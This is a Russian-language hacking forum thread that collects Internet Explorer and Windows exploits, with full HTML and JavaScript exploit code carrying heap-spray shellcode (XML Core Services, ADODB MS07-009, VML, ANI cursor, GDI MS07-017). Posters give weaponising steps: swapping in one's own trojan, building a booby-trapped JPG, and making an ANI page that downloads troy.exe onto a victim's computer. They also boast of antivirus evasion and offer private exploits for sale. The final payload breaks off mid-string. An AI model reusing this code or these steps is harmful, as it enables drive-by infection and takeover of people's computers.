Этот раздел открыт для нахождений линков и эксплойтов против Ослика! Выкладываем только живые линки и сплойты! И еще сплойты выкладавать только в txt-формате!
------------------------------------------------------------------------
[IE «Window()» 0day exploit]
Описание:
Корпорация MicroSoft снова отличилась нестабильностью своих продуктов.
На этот раз в public-источниках появился 0day эксплойт для Internet Explorer 6.0.
Баг актуален для версий Win2k и WinXP со всеми сервиспаками.
Суть ошибки состоит в простом переполнении буфера (а какие могут быть еще ошибки в продуктах MS?,
которое вызывается через функцию window() языка JavaScript.
Эксплойт состоит из 5 разных файлов. Стартовый HTML позволяет выбрать операционную систему.
После клика по соответствующей ссылке незамедлительно запустится калькулятор.
Учитывая, что шеллкод во вредоносном файле fillmem.htm можно легко изменить, эксплойт приравнивается к критическим
Poc:
0day (http://poonk.jino-net.ru/poc/0day.txt)
Про техническую реализацию уязвимости можно прочитать на ресурсе http://security.nnov.ru/Kdocument294.html
------------------------------------------------------------------------

[IE "Msdds.dll" Remote Exploit]
Описание:
В прошлом обзоре я писал про Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit, однако сплоит работал не на всех версиях браузера.
Недавно в паблик просочился код этого же сплоита, только функционирующего на WinXP+SP2 IE 6.0.
Сам эксплойт написан на Перле и его задача - создать бажную HTML-страницу.
В этой паге посредством object-тэга вызывается шелл-код, переполняющий буфер осла и оставляющий на память шелл на порту 28876.
Правда, как это обычно бывает, в эксплойте есть маленькая недоделка.
Знающий человек сразу догадается и исправит ошибку после первого неудачного запуска.
А незнающий - пойдет лесом :). После исправления недочета, достаточно запустить сплоит с редиректом в страницу blah.html, а затем попытаться открыть загадочную HTML-страницу.
Что будет дальше, ты, наверное, уже догадался
Poc:
Msdds (http://poonk.jino-net.ru/poc/Msdds.txt) (челы антивирь будет орать, говоря что это вирь! Это не так просто у сплойта сигнатура похожа на вирь!)
Информацию по этой уязвимости можно найти здесь: http://security.nnov.ru/Jdocument432.html
------------------------------------------------------------------------

[MS color management buffer overflow]
Описание:
За этот летний месяц вышло не так уж и много громких эксплойтов, однако некоторые багоискатели сумели наделать шума.
Так, например, 21 июля некий хакер отыскал уязвимость в модуле Internet Explorer.
Бажный плагин отвечает за подгрузку картинок на страницах ослика.
Автор эксплойта утверждает, что баг содержится в функции GetColorProfileElement.
Ошибка позволяет перезаписать стек определенным кодом.
В сплойте содержится шеллкод для запуска блокнота.
Но не все так хорошо, как написано в багтраке.
Лично у меня не получилось запустить ноутпад, а максимум чего я добился — аварийного завершения работы браузера.
Испытания проводились на чистой WinXP+SP2. Попробуй, быть может получится у тебя.
Poc:
MS_color (http://poonk.jino-net.ru/poc/MS_color.txt)
------------------------------------------------------------------------

[Microsoft MSHTA Script Execution]
Описание:
Опять Windows и опять Internet Explorer. На этот раз ошибка, найденная в ослике, позволяет запускать незарегистрированные типы файлов.
Чтобы было понятнее, рассмотрим атаку на простом примере. Создается hta-файл, выполняющий какую-либо команду (смотри заголовок эксплойта).
Затем запускается сам сплойт с двумя параметрами: путь к созданному hta-файлу и файл с незарегистрированным расширением (test.d0c, например).
После всего вышеперечисленного, попробуй запустить созданный файл в эксплорере.
Эта попытка увенчается успехом, а команда, вшитая в hta-шаблон будет мгновенно исполнена.
Эксплойт ориентирован для Windows-среды, поэтому компилируй его с помощью lcc.
В качестве команды, заданной в hta-файле может быть что угодно – от безобидного создания папки, до форматирования диска
Poc:
MSHTA (http://poonk.jino-net.ru/poc/MSHTA.txt)
Более подробное описание бага находится тут: www.securitylab.ru/53970.htm
------------------------------------------------------------------------

[Internet Explorer Cursor Processing Remote DoS]
Описание:
Недавно мир узнал о новых уязвимостях в браузере Internet Explorer 6.0.
На этот раз очередное переполнение позволяет перезагрузить операционную систему и в теории – выполнить любой код.
Подробности ошибки не разглашаются, однако известно, что переполнение буфера вызывается при обработке неправильного *.ani-файла.
Анимашка в нашем случае – это файл курсора, который умеет подгружать глупый ослик. Внедрение сокрушительного DoS’ера в html-файл происходит с помощью конструкции «body {CURSOR: url("ANIBLUE.ani")}».
Сам ANIBLUE.ani, как правило, находится в той же папке. Как ты догадался, эта конструкция – есть описание стиля HTML-документа.
Помимо глупой DoS-атаки, существует возможность выполнить любой код с правами текущего пользователя - на данный момент есть эксплойт, который открывает шелл на 28876 порту.
Однако поставляемая версия пока не работоспособна, потому придется немного повременить.
Poc:
icoExp (http://poonk.jino-net.ru/poc/icoExp.txt)! А еще забыл сказаьб когда скачаете сплойт то про его сохоанить в HTML-формате! Нет это безапастно так вы просмотрите его содержимое! Просто там коментарий много! Сплойт безапасен! Отвечаю за свой базар!

Сегодня дополню! Устал сильно! Прошу всех присоединится

оки... ждём

Прошу всем помочь!

ммм... понимаешь, KPOT_f!nd, эксплойты под IE (тем более рабочие) - весчь приватная.
Усли кого интересуют доступные эксплойты, советую скачать метасплойт и изучить:
ie_createobject.pm
ie_createtextrange.pm
ie_iscomponentinstalled.pm
ie_objecttype.pm
ie_xp_pfv_metafile.pm

Вот ещё:
http://security.nnov.ru/Gnews656.html

2 эксплоита для пассивной XSS для браузера Internet Explorer методом обхода граффического фильтра.
http://www.kodsweb.ru/sploits/ie_xss_bypass_GUI.rar -GUI
http://www.kodsweb.ru/sploits/ie_xss_bypass.rar -консольная

from:http://www.kodsweb.ru/main.php

мне бы ms05-027 качануть дето ,
пасиба -)

мне бы ms05-027 качануть дето ,
пасиба -)
_http://www.security.nnov.ru/files/mssmb_poc.c - сплойт
_http://www.lan.krasu.ru/struct/net/security/index.asp?part=3 заплатки всякие

раз тут уж такая тема , можт кто розкажет как пользоваться компилятором Faq , как компилировать а то я скачал

AfalinaSoft XL Report for C++Builder 4 4.1 build
ссылка http://www.afalinasoft.com/files/xlr4btrial123.exe
8мб

но вот провернуть никак не получается , кому не лень , кому ПЛЮС влепить ??

_http://www.security.nnov.ru/files/mssmb_poc.c - сплойт
_http://www.lan.krasu.ru/struct/net/security/index.asp?part=3 заплатки всякие
я не уточнил , я думал есть готовый де то , сам не умею компилить (

KPOT_f!nd
Если ты уж пишешь, то будь добр выкладывать источники
http://www.xakep.ru/magazine/xa/085/077/1.asp
ммм... понимаешь, KPOT_f!nd, эксплойты под IE (тем более рабочие) - весчь приватная.
Ну тут я не соглашусь :). Приватные эксплоиты считаються 0day сплоиты, и те регулярно выкладываються на багтраках значительно раньше, нежели выходит обновение. :). Во вторник обновление, в среду мы видим очередной рабочий код 0day сплоита для ослика :).
Последний хитовый с пробивом SP2 на моей памяти был VML сплоит, четыре версии которого можно найти на milw0rm.com.
Усли кого интересуют доступные эксплойты, советую скачать метасплойт и изучить
Вот тут полностью согласен :). На рынке существуют сейчас куча "приватных" связок, и прочих вещей, которые продаються за $ с несколькими нулями :)., и одновременно в сети есть доступный всем проект метасплоита, где регулярно выкладываються самые последние разработки.
ИМХО, начинать знакомство нужно именно с него. Больше вообще ничего не надо, пока проект жив.

Я так понял под "приватностью" Elekt имел ввиду то что они чьи-то, т. е там уже все параметры заложены. Вот взять бы ie_xp_metafile.pm - эксплоит-то сам давно в баблике, а отдать готовый никому нельзя (всё равно будет на тебя работать). Т. е. надо его пересобирать конкретно под свои нужды (сплоит+начинка+их параметры). Ну а так вообщё-то прав SladerNon, 0day сплоиты, пока они не выложены на багтракх, а продаются за несколько K$ - они и есть приватные. (то есть не публичные). Поэтому сплоит, работающий тока на тебя (уже заряженный начинкой с параметрами), язык как-то не поворачивается назвать публичным. Вот пакет Метасплоит публичный, исходники сплоитов тоже, а на выходе получаем совсем личные сплоиты! (читай приватные) ГЫ!. Тут (http://vulnerabilitywmf.narod.ru/) висят мои, ну и какие они? личные, публичные или приватные? Х .е. З. вообщем.

"Ani exploit" :D

Собирается он так: скачиваем ani-spl.exe запускаем с параметрами (ani-spl.exe name http:\\somesite\troy.exe) в результате получаем два файла - name.html и name.ani - код из name.html вставляем в любую страничку..
Необходимо чтобы с name.html в одной папке был и name.ani- он и скачает на комп жертвы troy.exe

*недостатки: работает только с IE +
*не работает в SP2

+абсолютно незаметен при запуске
+можно вставить его в сайт с нормальным содержанием.

AVP базы до 02.2005 не палит его
По-моему (имхо) лучший сплоит для IE на сегодняшний день. :D
Качаем нах... (http://www.tiiima.nm.ru/exploits/ani-spl.rar)

(платформа- Windows Explorer)
И так скачиваем (http://www.tiiima.nm.ru/exploits/ms04exp.rar) ms04exp.zip

1. подменяем hеllo.exe своим трояном.
2. Запускаем jpg_gen.bat.
3. компилируем проект(CTRL+F9), должен появится файл jpg_gen.bin
4. переименовываем в jpg_gen.jpg

При его запуске сначала наблюдается зависание. ПРИЧЕМ не надо открывать картинку достадочно лишь навести курсор ... и Троян сделает свое черное дело.

*недостатки: не работает в SP 2

+ легко выдать за свою фотку
+ появилось в базах AVP в 02.2005 т.е. :D
Необновленный каспер не спасёт.

А есть сплоиты для запуска pop-up или pop-exit окон, чтобы в SP2 не блокировались?
Был бы очень признателен. Если у кого есть приватный, то мог бы купить по сходной цене.
ICQ 402136

Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за ошибки проверки границ данных в Microsoft Vector Graphics Rendering (VML) библиотеке (vgx.dll) при обработке определенных VML документов. Удаленный пользователь может с помощью специально сформированного VML документа, содержащего слишком длинный метод fill внутри тега rect, вызвать переполнение стека и выполнить произвольный код на целевой системе.

Примечание: уязвимость активно эксплуатируется в настоящее время.

воздействие: отказ в обслуживании

20 сентября, 2006
<!--
Currently just a DoS

EAX is controllable and currently it crashes when trying to move EBX into the location pointed to by EAX

Shirkdog
-->


<html xmlns:v="urn:schemas-microsoft-com:vml">

<head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>

<body>


<v:rect style='width:120pt;height:80pt' fillcolor="red">
<v:fill method="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAABCD01" angle="-45"
focus="100%" focusposition=".5,.5" focussize="0,0"
type="gradientRadial" />
</v:rect>

</body>
</html>

# milw0rm.com [2006-09-19]
источник инф: http://www.securitylab.ru/poc/274149.php
А тут ie_vml_rectfill.pm (http://metasploit.com/projects/Framework/modules/exploits/ie_vml_rectfill.pm) - вполне рабочий сплоит от Metasploit Framework - проверял на SP2+IE6 (без патчей)

Свежие баги в IE..
Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)

Автор: José Carlos Nieto Jarquín
Дата: Ср. 6 Дек. 2006 11:01

Tested under Windows XP SP2, MSIE 6.0.2900.2180

Exploit 1
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWi dth+'px');">
<tr><td></td></tr>
</table>
</div>

Exploit 2
<div style="width: expression(window.open(self.location));">

</div>

Exploit 3
<html>
<head>
<title>Another non-standards compliant IE D.O.S.</title>
</head>
<body>
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(parseInt(window.open(self.location))+do cument.getElementById('foo').offsetWidth+'px');">
<tr>
<td>
IE makes my life harder :(. It sucks, don't use it :).
</td>
</tr>
</table>
</div>
Written by <a href="http://xiam.be">xiam</a>.<br />
Tested under IE 6.0.2900.2180
</body>
</html>

<! DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN">
<!--
MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit

Author: n/a

Info:
http://blogs.securiteam.com/index.php/archives/721
http://isc.sans.org/diary.php?storyid=1823
http://xforce.iss.net/xforce/alerts/id/239

Found in the wild and was pointed out on securiteam's blog (cheers Gadi Evron!)

Changed up the shellcode so it wouldn't be as evil for the viewers, calc.exe is called.

/str0ke
-->

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" >
</object>
<script>
var obj = null;
function exploit() {
obj = document.getElementById('target').object;

try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};

sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u 9090" +
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u 0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u 0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u 1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u 8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u F068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");

sz = sh.length * 2;
npsz = 0x400000-(sz+0x38);
nps = unescape ("%u0D0D%u0D0D");
while (nps.length*2<npsz) nps+=nps;
ihbc = (0x12000000-0x400000)/0x400000;
mm = new Array();
for (i=0;i<ihbc;i++) mm[i] = nps+sh;

obj.open(new Object(),new Object(),new Object(),new Object(), new Object());

obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
}
</script>
<body onLoad='exploit()' value='Exploit'>

</body></html>


Зашит на шеллкод - запуск калькулятора.
P.S. Вставленные пробелы в длинных строках убрать естестевнно...

Microsoft Internet Explorer ADODB.Recordset Double Free Memory Exploit (ms07-009)
Это код эксплуатирует "ошибка двойного освобождения" в msado15.dll, в NextRecordset () функции.
В результате двойного освобождения некоторой строки, возможна перезапись Управляющего блока Динамической памяти злонамеренным кодом.
Методика эксплуатации основана на "Переотображении хранения".
Выполняет calc.exe если успех.

P.S. У меня просто свалил браузер IE.

<HTML>
<!--
************************************************** ********************************
Microsoft Internet Explorer ADODB.Recordset Double Free Memory Exploit (ms07-009).
************************************************** ********************************
Review:
This code exploit "double free error" in msado15.dll NextRecordset() function.
As a result of double freeing of same string, rewriting of Heap Control Block
by malicious data is occuring.
Technique of exploitation is based on "Lookaside remapping".
Runs calc.exe if success.
-->
<HEAD>
<OBJECT id=obj classid=clsid:00000535-0000-0010-8000-00AA006D2EA4></OBJECT>
</HEAD>

<BODY onLoad='Go()'>

<script language=javascript>

//------------------Replace with your code-----------------------//
var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u 184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84 AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575 %u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u 018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C 78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0 %u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u 7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u00 63");
//------------------Replace with your code-----------------------//


//-------------Heap Repair Code. Do not Replace------------------//
var HeapRepairCode = unescape("%u9090%u9090%u186A%u645B%u038B%u408B%u8B30%u1840%u 5805%u0001%u3300%u89D2%u8910%u0450%u5089%u8908%u0C 50%uC083%u8928%u8900%u0440%uC083%u6608%u783D%u7C05 %u8BF2%u81D8%u90C3%u0000%u8900%u3318%u83D2%u04C0%u 1089%uC083%u8104%u80C3%u0000%u8900%u3318%u89C0%u83 03%u04C3%u8166%u88FB%u7C1E%u8BF4%u81D3%u70EB%u001E %u6600%u338B%u8966%u4232%uC642%u0802%u6642%u328B%u 3166%u4232%uC642%u1402%u6642%u328B%u3166%u4232%u66 42%uC381%u0160%u1389%u5389%u8904%u891A%u045A%u9090");
//-------------Heap Repair Code. Do not Replace------------------//

var part1 = '';
var part2 = '';
var partLen = 127;

function PrepMem()
{
//Standard Heap Spray Code
var heapSprayToAddress = 0x05050505;

var payLoadCode = HeapRepairCode + Shellcode;
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
}


function GetSystemVersion()
{
//Simple Detecting of OS version out of Jscript version:

var ver = "";
ver += ScriptEngineMajorVersion();
ver += ScriptEngineMinorVersion();
ver += ScriptEngineBuildVersion();

if ( ver<568820 ){ return("preSP2"); }
else if ( ver<575730 ){ return("SP2"); }
else return (0);
}


function PrepJmpcode(sp)
{
switch(sp){
case "preSP2":

var egg="";
egg+=unescape("%u0608%u0014");
egg+=unescape("%u0000%u0000");
egg+=unescape("%uF708%u0013");
egg+=unescape("%u0000%u0101");
egg+=unescape("%uFFFF%uFFFF");
egg+=unescape("%uFFFF%uFFFF");

part1+=unescape("%u0400%u0014");
part1+=unescape("%u320C%u77FC");
while (part1.length<partLen) {part1+=unescape("%u0505");}// ptr* shellcode

while (part2.length<(partLen-egg.length)) {part2+=unescape("%uFFFF");}
part2+=egg;

break;


case "SP2":

var egg="";
egg+=unescape("%u0608%u0014");
egg+=unescape("%u0000%u0000");
egg+=unescape("%uF708%u0013");
egg+=unescape("%u0000%u0101");
egg+=unescape("%uFFFF%uFFFF");
egg+=unescape("%uFFFF%uFFFF");

part1+=unescape("%u0505%u0505");
part1+=unescape("%ue128%u75c7");
while (part1.length<partLen) {part1+=unescape("%uFFFF");}

while (part2.length<(partLen-egg.length)) {part2+=unescape("%uFFFF");}
part2+=egg;

break;
}
}

function Exploit()
{
var arr=new Array();
var i=1;

while(i<500){
try{
k=1;
while(k<500){ arr[k]=part1+part2; k++; }
obj.NextRecordset( part1+part2 );
}catch(e){}
i++;
}
}

function Go(){
PrepMem();
PrepJmpcode( GetSystemVersion() );
Exploit();
}

</script>
</body>
</html>
# milw0rm.com [2007-03-26]

источник: http://milw0rm.com/exploits/3577 (берите на тестирование - тут без пробелов)

Microsoft Internet Explorer ADODB.Recordset Double Free Memory Exploit (ms07-009)
кстати хороший более-менее свежий сплоит.. тестил его не давно.. calc.exe НЕ ЗАПУСТИЛСЯ НИ НА ОДНОЙ МАШИНЕ(( просто ложит експлорер в даун, и все..
у когонить есть соображения, как его сделать рабочим? или для запуска приложения через этот сплоит нужны еще какиенить условия? или надо отредактировать шелкод?

кстати хороший более-менее свежий сплоит.. тестил его не давно.. calc.exe НЕ ЗАПУСТИЛСЯ НИ НА ОДНОЙ МАШИНЕ(( просто ложит експлорер в даун, и все..
у когонить есть соображения, как его сделать рабочим? или для запуска приложения через этот сплоит нужны еще какиенить условия? или надо отредактировать шелкод?
ИМХО ответ на твой вопрос:

//------------------Replace with your code-----------------------//
var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u 184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84 AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575 %u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u 018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C 78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0 %u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u 7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u00 63");
//------------------Replace with your code-----------------------//


//-------------Heap Repair Code. Do not Replace------------------//
var HeapRepairCode = unescape("%u9090%u9090%u186A%u645B%u038B%u408B%u8B30%u1840%u 5805%u0001%u3300%u89D2%u8910%u0450%u5089%u8908%u0C 50%uC083%u8928%u8900%u0440%uC083%u6608%u783D%u7C05 %u8BF2%u81D8%u90C3%u0000%u8900%u3318%u83D2%u04C0%u 1089%uC083%u8104%u80C3%u0000%u8900%u3318%u89C0%u83 03%u04C3%u8166%u88FB%u7C1E%u8BF4%u81D3%u70EB%u001E %u6600%u338B%u8966%u4232%uC642%u0802%u6642%u328B%u 3166%u4232%uC642%u1402%u6642%u328B%u3166%u4232%u66 42%uC381%u0160%u1389%u5389%u8904%u891A%u045A%u9090");
//-------------Heap Repair Code. Do not Replace------------------//


Ещё на секурлабе выложен http://www.securitylab.ru/poc/extra/293384.php - пока не пробовал (может есть отличия?)

Ещё на секурлабе выложен http://www.securitylab.ru/poc/extra/293384.php - пока не пробовал (может есть отличия?)
попробовал щас.. та же фигня, просто ложит осла в даун..

//------------------Replace with your code-----------------------//
var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u 184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84 AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575 %u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u 018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C 78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0 %u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u 7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u00 63");
//------------------Replace with your code-----------------------//
этот шеллкод нужно менять под себя, но и этот (дефолтный) код должен запускать калькулятор.. а он этого делать не хочет((

rijy - тебе нужен сполойт чтобы запускал .exe файлы на строне жетрвы?. Если что стучи есть один =)

rijy - тебе нужен сполойт чтобы запускал .exe файлы на строне жетрвы?. Если что стучи есть один =)
Имхо постановка такого вопроса не правильна....
Нужен именно этот сплоит, чтоб запустил калькулятор (тот шеллкод, что зашит в нём).

Свежак! 04/02/2007 Exploiting the ANI vulnerability on Vista (skape)
Эксплоит демонстрирует возможность выполнения произвольного кода из-за уязвимости в обработке Ani курсорчиков под винды.
Детальная информация (на английском) тут:http://metasploit.com/ и тут: http://securityvulns.ru/files/ani_exp.htm

<!--

..::[ jamikazu presents ]::..

Windows Animated Cursor Handling Exploit (0day) (Version3)

Works on fully patched Windows Vista
I think it is first real remote code execution exploit on vista =)

Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
(It also must to work on all nt based windows but not tested)

Update: It also bypass eeye security ani patch!

Author: jamikazu
Mail: jamikazu@gmail.com

Bug discovered by determina (http://www.determina.com)

Credit: milw0rm,metasploit, SkyLined, http://doctus.net/

invokes calc.exe if successful

-->


<html>
<head>

<script type="text/javascript">

function runpoc(count)
{
document.location.href="index"+count+".htm";
}
</script>
</head>

<body onLoad="runpoc(Math.round(100*Math.random()));">

</body>

</html>


как видно, самого кода сплоита тут нет... ;-)
затеститься (на запуск калькулятора) (http://securityvulns.ru/files/ani_exp.htm)

http://www.conecc.org/add_link.php?cat=0
http://www.csnmonline.org/add_link.php?cat=0

В осле не открывать!

Недавно в каталогах регил сайт и нашел забавный сплойт...
И там и там тоже самое ))
Честно говоря так и не расшифровал скрипт, кто подскажет что будет если цифры перевести в буквы?

Вот еще: http://www.fullccacademy.org/

Цель: Microsoft Windows

Воздействие: Выполнение произвольного кода

скачать эксплоит(архив) (http://www.securitylab.ru/_download/exploits/2007/04/ms07-17.zip)


<html>
<head>
<title>MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body {
SCROLLBAR-FACE-COLOR: #000000;
FONT-WEIGHT: normal;
SCROLLBAR-HIGHLIGHT-COLOR: #006600;
TEXT-TRANSFORM: none;
SCROLLBAR-SHADOW-COLOR: #000000;
COLOR: #339999;
SCROLLBAR-3DLIGHT-COLOR: #000000;
LINE-HEIGHT: normal;
SCROLLBAR-ARROW-COLOR: #ffffff;
SCROLLBAR-TRACK-COLOR: #000000;
FONT-STYLE: normal;
FONT-FAMILY: Fixedsys;
SCROLLBAR-DARKSHADOW-COLOR: #006600;
BACKGROUND-COLOR: #000000;
FONT-VARIANT: normal;
TEXT-DECORATION: none
}
a {
color: #33CC33;
text-decoration: none;
}
a:hover {
color: #00FFFF;
text-decoration: none;
}

-->
</style>
</head>

<body>
<p align='center'><font size='5'>MS Windows (.ANI) GDI Remote Elevation<br>
of Privilege Exploit (MS07-017)</font></p>
<p align='center'>&nbsp;</p>
<p align='left'><strong><font color="#00FFFF">Compatibility</font></strong><br>
All MS Windows 2000/XP before MS07-017 patch with IE 6 (and later ???).</p>
<p align='left'><strong><font color="#00FFFF">References</font></strong><br>
<a href='http://www.microsoft.com/technet/security/advisory/935423.mspx' target='_blank'>http://www.microsoft.com/technet/security/advisory/935423.mspx</a>
<br>
<a href="http://research.eeye.com/html/alerts/zeroday/20061106.html" target="_blank">http://research.eeye.com/html/alerts/zeroday/20061106.html</a>
<br>
<a href="http://www.milw0rm.com/exploits/3688" target="_blank">http://www.milw0rm.com/exploits/3688</a>
<br>
<a href="http://ivanlef0u.free.fr/?p=41" target="_blank">http://ivanlef0u.free.fr/?p=41</a>
</p>
<p align='left'><br>
Used technique for this exploit (C langage) :<br>
-&gt; <a href="http://www.milw0rm.com/exploits/3755" target="_blank">http://www.milw0rm.com/exploits/3755
<br>
</a>The same but the code is updated :<br>
-&gt; <a href="http://www.labo-asso.com/download/gdi_local_elevation_privilege_exploit_ms07_017.zip">http://www.labo-asso.com/download/gdi_local_elevation_privilege_exploit_ms07_017.zip</a></p>
<p align='left'>This exploit with source of payload (nasm) :<br>
<a href="http://www.labo-asso.com/download/gdi_remote_elevation_privilege_exploit_ms07_017.zi p">http://www.labo-asso.com/download/gdi_remote_elevation_privilege_exploit_ms07_017.zi p</a></p>
<p align='left'>Study (in French) :<br>
<a href="http://www.labo-asso.com/php/travaux/gdi_kernel_exploit.php" target="_blank">http://www.labo-asso.com/php/travaux/gdi_kernel_exploit.php</a></p>
<p align='left'> <strong><font color="#00FFFF">Patch</font></strong> <br>
<a href='http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx' target='_blank'>http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx</a>
</p>
<p><strong><font color="#00FFFF" size="4"><em>For educational only !</em></font></strong></p>
<p><font color="#00FFFF">if</font> (success) displays some kernel informations
with help a MessageBox; <br>
<font color="#00FFFF">else</font> alone knows...;</p>
<p>Coded by Lionel d'Hauenens <br>
bugs, comments,... : <a href='http://www.labo-asso.com' target='_blank'>http://www.labo-asso.com</a>
or <a href="http://www.labo-asso.com/forum" target="_blank">http://www.labo-asso.com/forum</a><br>
Avril 20, 2007</p>
</body>
</html>

<SCRIPT language="javascript">
var payLoadCode=unescape(
"%uE860%u0000%u0000%u815D%u06ED%u0000%u3100%u39C0%u 9085%u0004" +
"%u0F00%uF185%u0002%uE800%u03A6%u0000%uC009%u840F%u 02E4%u0000" +
"%uB5FF%u0514%u0000%uE850%u03C7%u0000%uC009%u840F%u 02D0%u0000" +
"%uC789%uC031%u5450%u406A%uCB68%u0006%u8D00%u0085%u 0000%u5000" +
"%uD7FF%u095B%u0FC0%uB184%u0002%u8900%u949D%u0004%u FF00%u9085" +
"%u0004%uE800%u0635%u0000%u9090%uE890%u0000%u0000%u 815D%u74ED" +
"%u0000%uE800%u02E7%u0000%uC009%u840F%u0284%u0000%u 95FF%u0500" +
"%u0000%u8589%u04A0%u0000%u95FF%u04FC%u0000%u8589%u 04A8%u0000" +
"%u95FF%u04F0%u0000%u8589%u04A4%u0000%uB5FF%u04A4%u 0000%u95FF" +
"%u04F4%u0000%u8589%u04AC%u0000%u858D%u04E4%u0000%u FF50%u5495" +
"%u0005%u0900%u0FC0%u0884%u0002%u8900%u9C85%u0004%u 3100%u4FFF" +
"%u8147%uFFFF%u00FF%u0F00%uF287%u0001%u3100%u89C0%u 2444%u5004" +
"%u5050%u1F68%u0F00%u5700%u95FF%u0504%u0000%uC009%u DA74%uC689" +
"%uDB31%u6A53%u8D10%uD485%u0004%u5000%u5753%u95FF%u 0540%u0000" +
"%uBD81%u04D8%u0000%u0000%u0800%u3F75%u958B%u04A0%u 0000%uB70F" +
"%u9C85%u0004%uC100%u04E0%uC389%uC383%u3B10%uDC9D%u 0004%u7300" +
"%u0122%u8BF0%u9C9D%u0004%uC100%u10EB%u3B66%u0858%u 1175%u7880" +
"%u080A%u0B75%u588B%u8304%uFEE3%u3966%u74D3%u560C%u 95FF%u0508" +
"%u0000%u6DE9%uFFFF%u89FF%u98B5%u0004%u8900%uB885%u 0004%u8B00" +
